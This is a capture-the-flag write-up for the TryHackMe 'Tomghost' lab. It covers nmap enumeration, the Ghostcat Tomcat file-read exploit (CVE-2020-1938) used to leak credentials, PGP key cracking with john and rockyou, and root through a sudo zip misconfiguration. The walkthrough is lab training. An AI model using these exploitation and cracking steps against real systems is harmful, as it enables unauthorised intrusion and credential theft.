TryHackMe – Tomghost

Step 1 – Reconnaissance

First step is to enumerate the machine. A simple nmap scan will do it:

nmap -Pn -sV --script vulners <IP>

Nmap scan report for 10.10.170.7
Host is up (0.055s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
8080/tcp open  http       Apache Tomcat 9.0.30
| vulners: 
|   cpe:/a:apache:tomcat:9.0.30: 
|_    	CVE-2020-1938	7.5	https://vulners.com/cve/CVE-2020-1938
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Step 2 – Web Exploitation

From the following Nmap scan, we can see that the box is vulnerable to CVE-2020-1938. Simple research revealed that this version of Apache Tomcat appears to be vulnerable to File Reading/Inclusion. The following exploit can allow us to read sensitive information, such as login credentials.

Article: nvd.nist.gov/vuln/detail/CVE-2020-1938
Exploit: exploit-db.com/exploits/48143

Download the exploit and run it using

python 48143.py <IP>

You should see a similar output:

Getting resource at ajp13://<IP>/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
	[USERNAME:PASSWORD]
  </description>

</web-app>

You should see the credentials at the end of the output.

Step 3 – User.txt

Use the following credentials to log into the machine via ssh.
After that, you can immediately get user.txt by browsing to /home and visiting another user’s directory.

Step 4 – Horizontal privilege escalation

Go back to the initial user’s home folder and take a look at what we got there. We can see that there are exactly 2 files: credential.pgp and tryhackme.asc. As we can easily guess, those files will reveal us some credentials (most likely for the second user).
A simple google search on PGP cracking led me to this article. This small guide tells us to crack the .asc file with john the ripper and then use it to open up the PGP.

Let’s first convert the .asc file into a suitable format by running:

gpg2john tryhackme.asc > hash

Then, what we need to do is simply run a rockyou-powered cracking process on the hash file:

john hash --wordlist=/usr/share/wordlists/rockyou.txt

A password is going to be revealed in a couple of seconds and we can finally use it to open up the .pgp file. Run the following command and enter the password:

gpg --import tryhackme.asc

You can now easily open the PGP file after importing the key.

gpg --decrypt credential.pgp

Bingo! We got the credentials. Now let’s ssh into the box and enumerate there.

Step 5 – Root

sudo -l reveals that we can run /usr/bin/zip as sudo. A given configuration is relatively famous and is covered by GTFOBins.
Link: https://gtfobins.github.io/gtfobins/zip/#sudo

Let’s follow the guide from GTFO and get the root shell!

Done! We now have root access and can finally read the /root/root.txt.

Thank you for reading! ☺️